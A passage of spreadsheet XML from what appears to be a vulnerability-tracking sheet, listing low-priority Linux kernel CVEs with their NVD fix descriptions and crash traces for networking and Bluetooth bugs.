      <c r="F449" s="5" t="inlineStr"/>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr"/>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: use wq_has_sleeper() in rds_cong_map_updated()
rds_cong_map_updated() runs after a peer's congestion map has been
rewritten (by rds_tcp_cong_recv() and rds_ib_cong_recv(), or the
clear-all in the loopback and IB send-completion paths).  It bumps
rds_cong_generation and then checks waitqueue_active() on
map-&gt;m_waitq and on rds_poll_waitq to decide whether anyone needs
waking.  atomic_inc() carries no ordering and waitqueue_active() is a
plain load, so nothing orders the map and generation stores before
the wait queue reads.  The waiters do the mirror image: rds_cong_wait()
adds itself to m_waitq and then tests the port bit, and rds_poll()
registers on rds_poll_waitq and then reads the generation.  That is
the store-buffering pattern described above waitqueue_active() in
include/linux/wait.h - the updater can observe an empty wait queue
while the waiter still observes the port as congested, and no wake-up
is issued.
rds_cong_wait() is an interruptible sleep with no timeout, so a
sender blocked on a congested port stays blocked until the next
congestion update from that peer arrives or a signal is delivered.
A poll() waiter misses the map-updated notification the same way.
Use wq_has_sleeper(), which is waitqueue_active() preceded by the
required full barrier, as rds_tcp_state_change() already does for
the same pattern.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90081</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90082</t>
        </is>
      </c>
      <c r="D450" s="5" t="inlineStr"/>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="inlineStr"/>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr"/>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: Cap MSI-X vectors to the device MSI-X table size
mana_gd_query_max_resources() sizes gc-&gt;num_msix_usable from resp.max_msix
and the CPU count, but never from the device MSI-X table. On a 1792 vCPU
M-series VM that yields 1793 while the table has 1024 entries, and
mana_gd_setup_remaining_irqs() then walks indices 1..1792, running off the
end of the region mapped by msix_map_region():
  BUG: unable to handle page fault for address: ff8e347f8b99800c
  RIP: 0010:msix_prepare_msi_desc+0x7a/0x90
  RAX: 0000000000004000 RBX: ff4330cb164ea780 RCX: ff8e347f8b998000
  Call Trace:
   &lt;TASK&gt;
   __msi_domain_alloc_irqs+0x13a/0x440
   msi_domain_alloc_irq_at+0x149/0x1b0
   mana_gd_setup+0x351/0x890
   mana_gd_probe+0x274/0x390
   &lt;/TASK&gt;
RAX is index 1024 * PCI_MSIX_ENTRY_SIZE, one entry past the table.
msi_insert_desc() does range check the index, but only against the MSI
domain hwsize, which matches the table only for devices on an MSI parent
domain. With a global PCI/MSI domain hwsize is MSI_XA_DOMAIN_SIZE, so
nothing bounds the request.
Cap num_msix_usable with pci_msix_vec_count().</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90082</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90083</t>
        </is>
      </c>
      <c r="D451" s="5" t="inlineStr"/>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="inlineStr"/>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr"/>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_ife: Only operate on Ethernet frames
act_ife encapsulates/decapsulates the original Ethernet header and uses
skb-&gt;dev-&gt;hard_header_len as the length of that header. That is only
correct for Ethernet devices: on a device where hard_header_len does not
match the L2 header that was actually pulled (PPP reports PPP_HDRLEN
while nothing is stripped on ingress), the ingress skb_push()/skb_pull()
use the wrong length and can hit skb_under_panic when headroom is tight.
IFE is Ethernet-only by design - it builds an outer ethhdr, rewrites
h_source/h_dest/h_proto, and calls eth_type_trans() on decode - so
instead of trying to make the offsets work for arbitrary link types,
simply drop packets that do not carry an Ethernet header.
Checking skb-&gt;dev-&gt;type alone is not enough. We have to cater for a
corner case where mirred can redirect an skb from a non-Ethernet device
to an Ethernet one, and skb-&gt;dev then says nothing about the framing the
skb actually has: an skb redirected from ppp0 reaches the target's ingress
hook with mac_len 0 and no Ethernet header at all. So at ingress also
require mac_len to be ETH_HLEN. On egress mac_len is not maintained, so
the device type is all we have; a bogus redirect there yields a malformed
frame rather than an out-of-bounds push, and it would be malformed with or
without IFE.
That corner case is not theoretical - redirecting from ppp0 into a veth
that has an ife encode action on its ingress hook panics without this
patch:
  skbuff: skb_under_panic: len:98 put:14 head:ffff88800e410000
          data:ffff88800e40fff5 tail:0x57 end:0x640 dev:veth3
  kernel BUG at net/core/skbuff.c:214!
  Call Trace:
   skb_push (net/core/skbuff.c:224 net/core/skbuff.c:2657)
   tcf_ife_act (net/sched/act_ife.c:829 net/sched/act_ife.c:874)
   tc_run (net/core/dev.c:4463)
   netif_receive_skb (net/core/dev.c:6463 net/core/dev.c:6522)
   tcf_mirred_to_dev (net/sched/act_mirred.c:248 net/sched/act_mirred.c:328)
   tcf_mirred_act (net/sched/act_mirred.c:489)
   tc_run (net/core/dev.c:4463)
   process_backlog (net/core/dev.c:6728)
With Ethernet framing guaranteed, use ETH_HLEN instead of
hard_header_len.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90083</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90084</t>
        </is>
      </c>
      <c r="D452" s="5" t="inlineStr"/>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="inlineStr"/>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr"/>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-vf: fix workqueue and netdev race in probe/remove
Initialize the VF workqueue before register_netdev() so ndo_set_rx_mode
does not queue work on a NULL workqueue. Unregister the netdev before
destroying the workqueue, and add proper probe error cleanup.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90084</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90085</t>
        </is>
      </c>
      <c r="D453" s="5" t="inlineStr"/>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="inlineStr"/>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr"/>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: fix NULL deref in NIX TM tree debugfs read path
rvu_dbg_nix_tm_tree_display() dereferences pfvf-&gt;sq_ctx without
checking whether the SQ context has been allocated. Reading
/sys/kernel/debug/octeontx2/nix/tm_tree for a NIX LF whose transmit
queues are not set up triggers a kernel oops.
Guard the read path the same way rvu_dbg_nix_tm_tree_write() already
does and return -EINVAL with a seq_file message when sq_ctx is NULL.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90085</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90086</t>
        </is>
      </c>
      <c r="D454" s="5" t="inlineStr"/>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="inlineStr"/>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr"/>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xsk: honor XDP_TX_METADATA in zero-copy path
The zero-copy path reads TX metadata whenever the UMEM has metadata space,
even if the descriptor does not set XDP_TX_METADATA. Pass descriptor
options through the metadata helpers and ignore metadata unless the option
is set.
This does not fix the existing per-WQE metadata handling for mlx5 MPWQEs.
Only the descriptor that starts a session passes through
xsk_tx_metadata_request() and configures offload state shared by the batch.
Metadata on descriptors joining an open session is therefore not validated
and does not configure its requested offloads. In addition, a non-NULL
metadata pointer from such a descriptor is treated as a timestamp
completion request even when XDP_TXMD_FLAGS_TIMESTAMP is not set, so its
metadata union can be overwritten with an unrequested timestamp. Fixing
mixed metadata states within one MPWQE requires a separate change.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90086</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90087</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2026-09-17</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr"/>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: do not leak an hci_conn when a second LE connect is rejected
create_le_conn_complete() decides whether the failed connection is
still pending by comparing it against hci_lookup_le_connect(), which
returns the first LE connection in BT_CONNECT. That is the same
connection only while at most one is pending.
Two can be pending. Connections created on the passive scan path sit
in BT_CONNECT with HCI_CONN_SCANNING set and are invisible to
hci_lookup_le_connect() until hci_le_create_conn_sync() clears the
flag when their command is issued, so the -EBUSY guard in
hci_connect_le() does not prevent a second connection from being
queued while the first is still on the scan path. Whenever two
connections are in BT_CONNECT at once, the lookup may return one
connection while create_le_conn_complete() is reporting the failure
of the other; the early exit then drops the error and hci_conn_failed()
never runs on the connection that failed.
The controller also rejects a second HCI_OP_LE_CREATE_CONN issued
while another connection creation is still outstanding, per Core Spec
Vol 4, Part E. The spec calls for Command Disallowed there; the
bcm43438 observed here answers with an LMP/LL error code instead,
which bt_to_errno() maps to the -EPROTO (-71) in the log below.
The leaked connection stays in BT_CONNECT forever, and because
hci_connect_le() refuses to dial while hci_lookup_le_connect() finds
anything, every subsequent attempt to reach any peer fails with
-EBUSY and no command reaches the controller at all.
Seen on a bcm43438 with two BLE peers polled on the same interval
(state 5 is BT_CONNECT; both handles are UNSET ones, allocated from
the ida above HCI_CONN_HANDLE_MAX):
  Bluetooth: hci1: Opcode 0x2013 failed: -71
  # hcitool con
          &lt; LE 14:9C:EF:03:68:81 handle 3840 state 5 lm CENTRAL
          &lt; LE C4:D3:6A:8C:B5:38 handle 3841 state 5 lm CENTRAL
A btmon capture across the next ten minutes of connect attempts
contains no HCI_OP_LE_CREATE_CONN at all; outgoing LE connections
do not recover until the adapter is reset. With this change the same
scenario fails the rejected connection cleanly and further connects
to both peers go through.
Ask about the connection itself instead of about the device.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90087</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90088</t>
        </is>
      </c>
      <c r="D456" s="5" t="inlineStr"/>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="inlineStr"/>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr"/>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: RFCOMM: Validate MTU in rfcomm_apply_pn() to prevent infinite loop
rfcomm_apply_pn() accepts the MTU value from a remote PN (Parameter
Negotiation) frame without checking for zero. When the remote peer
sends an MTU of zero, d-&gt;mtu is set to 0. This causes the sendmsg
path to enter an infinite loop when fragmenting data, as each fragment
has size == min_t(size_t, len, 0) == 0, so the remaining length never
decreases. The infinite allocation of zero-length skbs exhausts all
system memory.
Fix by clamping d-&gt;mtu to RFCOMM_DEFAULT_MTU when the negotiated
value is zero, consistent with the initial value assigned in
rfcomm_dlc_alloc().</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90088</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90089</t>
        </is>
      </c>
      <c r="D457" s="5" t="inlineStr"/>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="inlineStr"/>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr"/>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btnxpuart: Validate the FW dump header length
nxp_process_fw_dump() pulls the ACL header off the frame and then reads
seq_num and buf_len from a struct nxp_fw_dump_hdr placed at skb-&gt;data,
without checking that the ACL payload is long enough to contain it.
h4_recv_buf() collects HCI_ACL_HDR_SIZE bytes of header followed by the
number of payload bytes named in that header, so skb-&gt;len is 4 + dlen
with dlen supplied by the controller and possibly smaller than the 8
byte dump header, or zero. A short frame with connection handle 0xfff
therefore reads both fields from beyond the received data.
Beyond the read itself, buf_len is what terminates a dump: a value of
zero makes the driver call hci_devcd_complete() and reset the
controller, so a truncated frame can end a dump early.
Use skb_pull_data() to validate and pull the FW dump header before
accessing its fields. Warn and reject the chunk if the header is
truncated.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90089</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90090</t>
        </is>
      </c>
      <c r="D458" s="5" t="inlineStr"/>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="inlineStr"/>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr"/>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btmtksdio: Fix out-of-bounds DMA read in the TX path
btmtksdio_tx_packet() rounds the transfer size up to the SDIO block size
of 256 bytes, but hands the host controller the SKB buffer as is:
	err = sdio_writesb(bdev-&gt;func, MTK_REG_CTDR, skb-&gt;data,
			   round_up(skb-&gt;len, MTK_SDIO_BLOCK_SIZE));
Only skb-&gt;len bytes hold packet data, so the controller reads up to 255
bytes of uninitialised memory and sends it to the device over the SDIO
bus. Depending on how much tailroom slack the SKB allocation happens to
carry, that read can also extend past the end of the buffer.
Compute the padded length up front, ensure the SKB has tailroom for it,
and zero-fill the padding with skb_put_zero(). skb-&gt;len then covers the
padding, so sdio_writesb() no longer needs to round up. byte_tx keeps
counting the header and the payload only, and the error path restores the
SKB so that the caller can requeue it.
Writing behind skb-&gt;tail is only safe because the driver owns the buffer,
which "Bluetooth: btmtksdio: Take exclusive ownership of the SKB before
TX" ensures.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90090</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90091</t>
        </is>
      </c>
      <c r="D459" s="5" t="inlineStr"/>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="inlineStr"/>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr"/>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix race l2cap_sock_cleanup_listen() vs. put_chan
For L2CAP sockets without owning sk-&gt;sk_socket, reading
l2cap_pi(sk)-&gt;chan may race against concurrent l2cap_sock_kill() -&gt;
l2cap_sock_put_chan().  This excludes simultaneous proto_ops callbacks,
but access in l2cap_sock_cleanup_listen() has unsafe lockless read.
 [Task 1]                         [Task 2 (hdev-&gt;workqueue)]
 l2cap_sock_release(parent)       l2cap_disconn_cfm
   l2cap_sock_cleanup_listen        l2cap_conn_del
     bt_accept_dequeue                l2cap_chan_del
       lock_sock(sk)                    l2cap_sock_teardown_cb
       bt_accept_unlink
         bt_sk(sk)-&gt;parent = NULL
       release_sock(sk) ----------------&gt; lock_sock(sk)
                                          parent = /* NULL */
     lock_sock(sk) &lt;--------------------- release_sock(sk)
                                          sock_set_flag(sk, SOCK_ZAPPED)
                                      l2cap_sock_close_cb
                                        l2cap_sock_kill(sk)
                                          l2cap_sock_put_chan
     chan = READ l2cap_pi(sk)-&gt;chan         l2cap_pi(sk)-&gt;chan = NULL
     l2cap_chan_hold_unless_zero            l2cap_put_chan(chan)
       kref_get_unless_zero(&amp;chan-&gt;ref)
Task 1 may observe NULL which causes null-ptr-deref.
Fix the race by taking lock_sock() in l2cap_sock_kill() to
synchronize with l2cap_sock_cleanup_listen().  hold_unless_zero() is not
needed here, l2cap_pi(sk)-&gt;chan owns reference if it is non-NULL.
Clarify code comments vs. locking.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90091</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90092</t>
        </is>
      </c>
      <c r="D460" s="5" t="inlineStr"/>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="inlineStr"/>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr"/>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: reject accept queue add unless BT_LISTEN
New sk should not be added to parent socket accept queue after last
l2cap_sock_cleanup_listen() has run in l2cap_sock_teardown_cb() and
state set to BT_CLOSED, as that can result to UAF on dereferencing the
dangling parent reference.
l2cap_sock_new_connection_cb() may race with parent l2cap_chan teardown,
due to chan-&gt;state accessed without consistent locking:
  [Task 1]                           [Task 2]
  l2cap_sock_release(parent)         l2cap_connect
    l2cap_sock_shutdown                pchan = l2cap_global_chan_by_psm
      l2cap_chan_lock(pchan)
      l2cap_chan_close
        l2cap_sock_teardown_cb
          pchan-&gt;state = BT_CLOSED
      l2cap_chan_unlock(pchan) ------&gt; l2cap_chan_lock(pchan)
                                       l2cap_new_connection
                                         l2cap_sock_new_connection_cb
      l2cap_chan_lock(pchan) &lt;-------- l2cap_chan_unlock(pchan)
      l2cap_sock_kill(parent)          /* bt_sk(sk)-&gt;parent dangling */
Fix by adding check for sk_state == BT_LISTEN after acquiring sk lock in
l2cap_sock_new_connection_cb().  Add lock_sock() around sk_state writes
where missing, to avoid data races.
Although the data races on pchan-&gt;state should be fixed too, this
defensive sk_state check probably makes sense in any case.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90092</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90093</t>
        </is>
      </c>
      <c r="D461" s="5" t="inlineStr"/>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="inlineStr"/>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr"/>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: access chan-&gt;conn safely in get/setsockopt
Since commit b66774b48dd9 ("Bluetooth: L2CAP: Fix UAF in channel timeout by holding conn ref")
l2cap_chan::conn has held reference and remains non-NULL also after the
corresponding hci_conn is deleted.  In this state accessing various
fields eg. hci_conn::hdev is invalid, which leads to KASAN crash in
l2cap_sock_setsockopt() access of conn-&gt;hcon-&gt;hdev.
